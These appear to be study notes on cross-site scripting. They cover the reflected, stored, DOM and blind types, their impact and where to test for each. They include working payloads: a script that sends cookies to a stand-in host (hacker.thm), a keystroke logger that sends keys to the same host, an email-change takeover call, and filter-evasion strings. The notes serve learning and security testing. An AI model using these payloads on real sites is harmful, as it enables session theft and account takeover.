Cross-Site Scripting (XSS)

Introduction

• Cross-Site Scripting (XSS) as an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users.

Useful Payloads

• To display a basic alert box.

  <script>alert('XSS');</script>
• To steal user cookie.

  <script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
• To steal keystrokes by acting as a keylogger.

  <script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
• To call a javascript function

  <script>user.changeEmail('attacker@hacker.thm');</script>

Types of XSS

• There are 4 different types of XSS
  • Reflected XSS
  • Stored XSS
  • DOM XSS
  • Blind XSS

Reflected XSS

• Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation.

Impact

• The attacker could send links or embed them into an iframe on another website containing a JavaScript payload to potential victims getting them to execute code on their browser, potentially revealing session or customer information.

Test For Reflected XSS

• Test the areas where the user input is reflected back. Examples include
  • Parameters in the URL Query String
  • URL File Path
  • Sometimes HTTP Headers (although unlikely exploitable in practice)

Stored XSS

• In Stored XSS, the payload is stored on the web application (in a database, for example) and then gets run when other users visit the site or web page.

Impact

• Stored XSS is more dangerous than Reflected XSS.
• It gets executed to any user visiting the infected webpage without attacker sending anything to victim.
• Stored XSS can redirect users to another site, steal the user's session cookie, or perform other website actions while acting as the visiting user.

Test For Stored XSS

• Test for areas where the data is stored and then shown back to other users. Examples include
  • Comments on a blog
  • User profile information
  • Website Listings

DOM Based XSS

• DOM stands for Document Object Model
• DOM is the programming interface for HTML and XML documents.
• DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code.

Impact

• Crafted links could be sent to potential victims, redirecting them to another website or steal content from the page or the user's session.

Test For DOM Based XSS

• Look for parts of the code that access certain variables that an attacker can have control over, such as window.location.x parameters.
• Look for unsafe JavaScript methods called sinks such as eval().

Blind XSS

• Blind XSS is similar to Stored XSS but the execution result is not displayed on the browser.

Impact

• Using the correct payload, the attacker's JavaScript could make calls back to an attacker's website, revealing the staff portal URL, the staff member's cookies, and even the contents of the portal page that is being viewed.

Test For Blind XSS

• When testing for Blind XSS vulnerabilities, you need to ensure your payload has a call back (usually an HTTP request). This way, you know if and when your code is being executed.
• A popular tool for Blind XSS attacks is XSS Hunter Express (https://github.com/mandatoryprogrammer/xsshunter-express).

XSS Payloads

1. <script>alert('XSS');</script>
2. "><script>alert('XSS');</script>
3. </textarea><script>alert('XSS');</script>
4. ';alert('XSS');//
5. <sscriptcript>alert('XSS');</sscriptcript>
6. /images/cat.jpg" onload="alert('XSS');